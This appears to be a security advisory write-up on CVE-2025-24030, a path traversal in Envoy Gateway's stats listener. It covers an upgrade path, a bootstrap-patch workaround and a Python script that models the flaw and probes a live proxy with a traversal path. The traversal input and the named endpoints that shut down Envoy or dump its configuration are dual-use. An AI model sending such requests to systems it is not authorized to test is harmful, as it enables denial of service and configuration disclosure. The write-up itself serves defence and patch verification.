Envoy Gateway, the open-source project that manages Envoy Proxy as a standalone or Kubernetes-based application gateway, contains a vulnerability in all versions prior to 1.2.6. Tracked as CVE-2025-24030, it allows anyone who can reach the stats port of a proxy managed by Envoy Gateway from inside the cluster network to perform a path traversal and reach the Envoy Admin interface, running admin commands that were never meant to be exposed.
Vulnerability Details
Envoy Gateway is an open-source API gateway that provisions and configures Envoy Proxy for standalone and Kubernetes-based deployments. Every proxy fleet provisioned with the default bootstrap by Envoy Gateway 1.2.5 or earlier is affected.
The default bootstrap starts a stats listener (port 19001 by default) whose single route forwards requests for the Prometheus metrics path /stats/prometheus to the Envoy Admin interface, which itself listens only on localhost (port 19000 by default). That route matches by path prefix and the listener does not normalize paths, so a request whose path starts with /stats/prometheus but then climbs back out with ".." segments is still forwarded. The admin interface resolves the traversal and dispatches the request to whichever admin handler the collapsed path now names. A client that can reach the stats port can therefore call admin endpoints such as /quitquitquit, which terminates the Envoy process, or /config_dump, which returns the running configuration and any sensitive data it carries.
Solution
Upgrade to Envoy Gateway version 1.2.6 or later, which hardens the stats listener in the default bootstrap. The Envoy Gateway controller regenerates the bootstrap for managed proxies, so make sure the proxy Deployments are rolled out with the new configuration after the controller upgrade.
Workaround
If you cannot upgrade Envoy Gateway immediately, a temporary workaround exists: use the EnvoyProxy API (the resource that customises the proxies Envoy Gateway generates for a GatewayClass) to apply a bootstrap patch that makes the stats listener normalize paths before routing and accept only the exact Prometheus metrics path. This shrinks the attack surface for the duration of the rollout; it is not a substitute for upgrading.
Here is an example of such a bootstrap patch. It uses the JSONPatch bootstrap type of the EnvoyProxy resource, and the JSON pointer paths assume the layout of the default bootstrap (the stats listener is listener 0, the HTTP connection manager is its first filter, and the metrics route is the first route of the first virtual host); if you already customise the bootstrap, adjust the indices to match, and compare against the patch published in the upstream security advisory.

apiVersion: gateway.envoyproxy.io/v1alpha1
kind: EnvoyProxy
metadata:
  name: restrict-stats-listener
  namespace: envoy-gateway-system
spec:
  bootstrap:
    type: JSONPatch
    jsonPatches:
      # Collapse ".." segments and duplicate slashes before routing, so a
      # traversal no longer begins with /stats/prometheus when matched.
      - op: add
        path: /static_resources/listeners/0/filter_chains/0/filters/0/typed_config/normalize_path
        value: true
      - op: add
        path: /static_resources/listeners/0/filter_chains/0/filters/0/typed_config/merge_slashes
        value: true
      # Match the metrics path exactly instead of by prefix.
      - op: replace
        path: /static_resources/listeners/0/filter_chains/0/filters/0/typed_config/route_config/virtual_hosts/0/routes/0/match
        value:
          path: /stats/prometheus

The EnvoyProxy resource only takes effect for proxies whose GatewayClass references it:

apiVersion: gateway.networking.k8s.io/v1
kind: GatewayClass
metadata:
  name: eg
spec:
  controllerName: gateway.envoyproxy.io/gatewayclass-controller
  parametersRef:
    group: gateway.envoyproxy.io
    kind: EnvoyProxy
    name: restrict-stats-listener
    namespace: envoy-gateway-system

Replace the GatewayClass name and the namespace with the ones used in your installation (envoy-gateway-system is the default namespace of the Envoy Gateway controller). After applying, confirm that the proxies were re-rendered and that a plain GET /stats/prometheus on the stats port still returns metrics, while a request carrying ".." segments is rejected.
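To make the mechanism concrete, the following Python script is an added example; it is not from the original page, the advisory, or the Envoy Gateway project. The first part models the routing decision of the stats listener described under Vulnerability Details for the four combinations of prefix-or-exact match and normalize-or-not, which shows why the workaround above stops the traversal. The second part is an optional live probe that sends the same raw paths to a proxy's stats port so you can verify a deployment before and after patching. It assumes the default stats port 19001, uses the read-only admin endpoint /server_info as a harmless target, approximates Envoy's normalization with a simple dot-segment collapse, and treats the admin interface as always normalizing the path it receives.

```python
"""Model of the CVE-2025-24030 routing decision plus a live probe.

Added example; not Envoy Gateway project code. Assumptions (not from the
advisory): stats port 19001, /server_info as a harmless admin target, and a
simplified normalization that collapses "." / ".." segments and repeated
slashes without percent-decoding.
"""
import http.client
from dataclasses import dataclass
from typing import Dict, Optional

STATS_PATH = "/stats/prometheus"
TRAVERSAL = STATS_PATH + "/../../server_info"   # illustrative traversal path


def normalize(path: str) -> str:
    """Collapse '.' and '..' segments and merge duplicate slashes.

    Approximates Envoy's normalize_path + merge_slashes for the path portion
    only (query string handled by the caller). Trailing slashes are dropped.
    """
    stack = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue                # merge slashes, drop "."
        if seg == "..":
            if stack:
                stack.pop()         # climb out of the previous segment
            continue
        stack.append(seg)
    return "/" + "/".join(stack)


@dataclass(frozen=True)
class StatsListener:
    """The two knobs the workaround turns on the stats listener's HCM."""
    normalize_path: bool   # HCM normalize_path / merge_slashes
    exact_match: bool      # route match `path:` (True) vs `prefix:` (False)

    def forwards_to_admin(self, raw_path: str) -> Optional[str]:
        """Return the path the admin interface ends up handling, or None if
        the stats listener drops the request (404) before forwarding."""
        path, sep, query = raw_path.partition("?")
        if self.normalize_path:
            path = normalize(path)
        if self.exact_match:
            matched = path == STATS_PATH
        else:
            matched = path.startswith(STATS_PATH)
        if not matched:
            return None
        # The admin interface normalizes what it receives before choosing a
        # handler; this is the step a forwarded traversal abuses.
        return normalize(path) + sep + query


VULNERABLE = StatsListener(normalize_path=False, exact_match=False)  # default < 1.2.6
HARDENED = StatsListener(normalize_path=True, exact_match=True)      # workaround


def probe(host: str, port: int = 19001, timeout: float = 3.0) -> Dict[str, int]:
    """Send raw paths to a proxy's stats port and return HTTP status per path.

    http.client is used because it sends the path verbatim and does not
    resolve '..' on the client side. A 200 for TRAVERSAL means the admin
    interface answered and the proxy is still vulnerable.
    """
    results: Dict[str, int] = {}
    for path in (STATS_PATH, TRAVERSAL):
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request("GET", path)
            results[path] = conn.getresponse().status
        finally:
            conn.close()
    return results


if __name__ == "__main__":
    import sys
    for name, listener in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        for req in (STATS_PATH, TRAVERSAL):
            print(f"{name:10s} {req:40s} -> {listener.forwards_to_admin(req)}")
    if len(sys.argv) > 1:          # python3 script.py <proxy-pod-ip> [port]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 19001
        print(probe(sys.argv[1], port))
```

Run it without arguments to see the model: the vulnerable listener forwards the traversal and the admin interface handles /server_info, while the hardened listener returns None for it and still serves the exact metrics path. Pass a proxy pod IP (and port, if you changed the default) to probe a live deployment from a pod inside the cluster.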
Original References
- Envoy Gateway GitHub Repository: https://github.com/envoyproxy/envoy-gateway
- Envoy Proxy Official Documentation: https://www.envoyproxy.io/docs/envoy/latest/
- Kubernetes Official Documentation: https://kubernetes.io/docs/home/
- CVE-2025-24030 Official CVE Record: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24030
Conclusion
In the wrong hands this vulnerability means a denial of service (the Envoy process can be shut down) or disclosure of the proxy configuration. Upgrade to Envoy Gateway 1.2.6 or later as soon as possible, and apply the bootstrap patch above in the meantime if the upgrade has to wait. Keeping Envoy Gateway and Envoy Proxy current with security releases, and not exposing the stats port beyond the clients that need it, remains the baseline. Watch the original references for updates to this CVE.
Timeline
Published on: 01/23/2025 04:15:07 UTC